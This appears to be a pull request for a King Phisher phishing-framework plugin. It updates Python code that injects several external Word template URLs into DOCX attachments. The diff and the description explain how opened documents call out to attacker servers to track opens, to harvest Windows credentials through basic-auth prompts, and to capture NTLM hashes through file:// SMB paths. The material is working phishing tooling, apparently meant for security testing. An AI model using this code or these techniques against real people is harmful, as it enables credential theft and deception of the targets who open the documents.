### PR TITLE
Updated phishery to multi entries

### DIFF
--- a/client/phishery_docx.py
+++ b/client/phishery_docx.py
@@ -2,13 +2,18 @@ import argparse
 import os
 import random
 import zipfile
+import distutils.version
 
 import king_phisher.archive as archive
 import king_phisher.client.plugins as plugins
+import king_phisher.version as version
 
 PARSER_EPILOG = """\
 If no output file is specified, the input file will be modified in place.
 """
+min_version = '1.9.0b5'
+StrictVersion = distutils.version.StrictVersion
+api_compatible = StrictVersion(version.distutils_version) >= StrictVersion(min_version)
 
 def path_is_doc_file(path):
 	if os.path.splitext(path)[1] not in ('.docx', '.docm'):
@@ -18,45 +23,74 @@ def path_is_doc_file(path):
 	return True
 
 def phishery_inject(input_file, https_url, output_file=None):
+	target_string = '<Relationship Id="{rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target_url}" TargetMode="External"/>'
 	input_file = os.path.abspath(input_file)
-	patches = {}
-	rid = 'rId' + str(random.randint(10000, 99999))
+	https_urls = https_url.split()
+	rids = []
+	while len(rids) < len(https_urls):
+		rid = 'rId' + str(random.randint(10000, 99999))
+		if rid not in rids:
+			rids.append(rid)
+
 	settings = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
 	settings += '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
-	settings += '<Relationship Id="{rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target_url}" TargetMode="External"/>'
+	for url in https_urls:
+		settings += target_string.format(rid=rids[https_urls.index(url)], target_url=url)
 	settings += '</Relationships>'
-	settings = settings.format(rid=rid, target_url=https_url)
+
+	patches = {}
 	patches['word/_rels/settings.xml.rels'] = settings
 	with zipfile.ZipFile(input_file, 'r') as zin:
 		settings = zin.read('word/settings.xml')
 	settings = settings.decode('utf-8')
-	settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
+	for rid in rids:
+		settings = settings.replace('/><w', "/><w:attachedTemplate r:id=\"{0}\"/><w".format(rid), 1)
 	patches['word/settings.xml'] = settings
 	archive.patch_zipfile(input_file, patches, output_file=output_file)
 
 class Plugin(getattr(plugins, 'ClientPluginMailerAttachment', plugins.ClientPlugin)):
-	authors = ['Ryan Hanson', 'Spencer McIntyre']
+	authors = ['Ryan Hanson', 'Spencer McIntyre', 'Erik Daguerre']
 	title = 'Phishery DOCX URL Injector'
 	description = """
-	Use Phishery to inject Word Document Template URLs into DOCX files. This can
-	be used in conjunction with a server page that requires Basic Authentication
-	to collect Windows credentials. Note that for HTTPS URLs, the King Phisher
-	server needs to be configured with a proper, trusted SSL certificate for
-	the user to be presented with the basic authentication prompt.
-
+	Inject Word Document Template URLs into DOCX files. The Phishery technique is
+	used to place multiple document template URLs into the word document (one per
+	line from the plugin settings).\n\n
+	* HTTP URL\n\n
+	The Jinja variable {{ url.webserver }} can be used for an HTTP URL to track when
+	documents are opened.\n
+	Note that to only track opened documents, DO NOT put a URL link into the
+	phishing email to the landing page. This will ensure that visits are only
+	registered for instance where the document is opened.\n\n
+	* HTTPS URL\n\n
+	The Jinja variable {{ url.webserver }} can be used for an HTTPS landing page
+	that requires basic authentication.\n
+	Note that for HTTPS URLs, the King Phisher server needs to be configured with a
+	proper, trusted SSL certificate for the user to be presented with the basic
+	authentication prompt.\n\n
+	* FILE URL\n\n
+	Utilizing the file://yourtargetserver/somepath URL format will capture SMB
+	credentials.\n
+	Note that King Phisher does not support SMB, and utilization of SMB requires
+	that a separate capture/sniffer application such as Metasploit's
+	auxiliary/server/capture/smb module will have to be used to capture NTLM hashes.
+	The plugin and King Phisher will only support injecting the URL path into the
+	document.\n\n
+	Original Project:\n
 	Phishery homepage: https://github.com/ryhanson/phishery
 	"""
 	homepage = 'https://github.com/securestate/king-phisher-plugins'
 	options = [
 		plugins.ClientOptionString(
 			'target_url',
-			'An optional target URL. The default is the phishing URL.',
+			'An optional target URLs. The default is the phishing URLs.',
 			default='{{ url.webserver }}',
-			display_name='Target URL'
+			display_name='Target URLs',
+			**({'multiline': True} if api_compatible else {})
 		)
 	]
-	req_min_version = '1.9.0b5'
-	version = '2.0.1'
+	req_min_version = min_version
+	version = '2.0.2'
+
 	def initialize(self):
 		mailer_tab = self.application.main_tabs['mailer']
 		self.text_insert = mailer_tab.tabs['send_messages'].text_insert


### PR DESCRIPTION
# Basic PR Information
This PR updates the phishery plugin to support multiple URLs to be injected into a DOCX document. 
This expands the capabilities of using this attack as the document will call out to all the URLs injected into the document. So you can use a combination of any of the descriptions of the acceptable URLs below to conduct the attack. Once the plugin is installed the URLs can be added to Edit > Preferences > Plugin tab. One URL will need to be entered per line of the multi-line string box. 

Description is also updated to describe use cases for the plugin.
This plugin can be used to track when a target opens the document. This is best achieved by utilizing the Jinja syntax `{{ url.webserver }}' and having the landing page being an HTTP page. For best results do not have a link to the landing page in the phishing email, so all visit tracking is only associated with document opens.

The plugin can still be used to conduct credential gathering through basic authentication utilizing an HTTPS landing page with a trusted certificate. 

Can also be used to gather NTLM hashes by setting the URL to a `file://sever/path` to a malicious SMB server capture/sniffer instance.

# Testing // checks
- [x] Install and enable the plugin
- [x] Open up King Phisher Preferences in the edit menu
  - [x] Select the Plugins Tab
  - [x] Enter URLs to be injected into the document (One per line)
- [x] Attach a DOCX file to be sent with the email
- [x] Send phish
- [x] Download and open document
- [x] Document will visit the URLs injected into the file
- [x] If URL is HTTP/HTTPS visits will be tracked
- [ ] if URL is `file://` and a SMB Server is active to capture/sniff SMB traffic NTLM hashes are captured
- [x] Description of plugin is accurate